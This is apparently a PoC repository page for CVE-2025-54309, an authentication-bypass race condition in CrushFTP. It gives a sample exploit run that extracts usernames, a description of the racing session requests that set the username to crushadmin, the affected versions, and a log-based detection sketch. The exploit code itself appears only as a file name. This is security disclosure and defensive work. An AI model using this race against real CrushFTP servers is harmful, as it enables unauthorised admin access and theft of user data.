CVE-2025-54309 PoC — CrushFTP Security Vulnerability

Associated Vulnerability
Title: CrushFTP Security Vulnerability (CVE-2025-54309)
Description: CrushFTP 10 before 10.8.5 and 11 before 11.3.4_23, when the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS, as exploited in the wild in July 2025.
Readme

# CVE-2025-54309
A CrushFTP Authentication Bypass Proof of Concept
 
See our [blog post](https://labs.watchtowr.com/) for technical details

# Detection in Action


```
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

```

# Description

This script is a proof of concept for CVE-2025-54309 against CrushFTP interfaces. It sends a set of racing requests that share the same session identifiers: one request sets the username property to "crushadmin", and one request executes an authenticated command as this user. When the race is won, this PoC can extract the list of usernames. More details are described in our [blog post](https://labs.watchtowr.com/).
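The traffic pattern in the run above (many `getUserList` requests on one `c2f` value in a short burst, with the value rotated every 50 requests) can be looked for in request telemetry. The following is an added detection sketch, not part of the watchTowr PoC or of CrushFTP; the record layout (`timestamp client_ip c2f command`), the sample data and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def sample_log():
    """Constructed records, NOT real CrushFTP log output: 'timestamp client_ip c2f command'."""
    base = datetime(2025, 7, 20, 12, 0, 0)
    # An ordinary admin session: two getUserList calls a minute apart.
    lines = [f"{base.isoformat()} 10.0.0.5 aB3d getUserList",
             f"{(base + timedelta(seconds=60)).isoformat()} 10.0.0.5 aB3d getUserList"]
    # A burst of 100 requests in about one second, c2f rotated after 50 requests.
    for i in range(100):
        ts = base + timedelta(milliseconds=10 * i)
        token = "6XDQ" if i < 50 else "qUwd"
        lines.append(f"{ts.isoformat()} 203.0.113.7 {token} getUserList")
    return lines

def parse(line):
    ts, ip, c2f, command = line.split()
    return datetime.fromisoformat(ts), ip, c2f, command

def find_race_bursts(lines, window=timedelta(seconds=5), min_requests=20,
                     command="getUserList"):
    """Return {client_ip: {c2f, ...}} for clients that sent at least
    min_requests `command` requests on a single c2f value within `window`."""
    by_session = defaultdict(list)
    for line in lines:
        ts, ip, c2f, cmd = parse(line)
        if cmd == command:
            by_session[(ip, c2f)].append(ts)
    flagged = defaultdict(set)
    for (ip, c2f), stamps in by_session.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it spans at most `window`.
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= min_requests:
                flagged[ip].add(c2f)
                break
    return dict(flagged)

if __name__ == "__main__":
    for ip, tokens in find_race_bursts(sample_log()).items():
        print(f"possible session race burst from {ip}: c2f values {sorted(tokens)}")
```

Tune `window` and `min_requests` against normal WebInterface traffic before alerting on the result.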

# Affected Versions

* 10 before 10.8.5
* 11 before 11.3.4_23

More details at [CrushFTP Advisory](https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025)

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
File Snapshot

```
[4.0K] /data/pocs/72cfbd00c7e264a42c4e11a8a26b91ca887205bf
├── [2.2K] README.md
└── [6.5K] watchTowr-vs-CrushFTP-CVE-2025-54309.py

0 directories, 2 files
```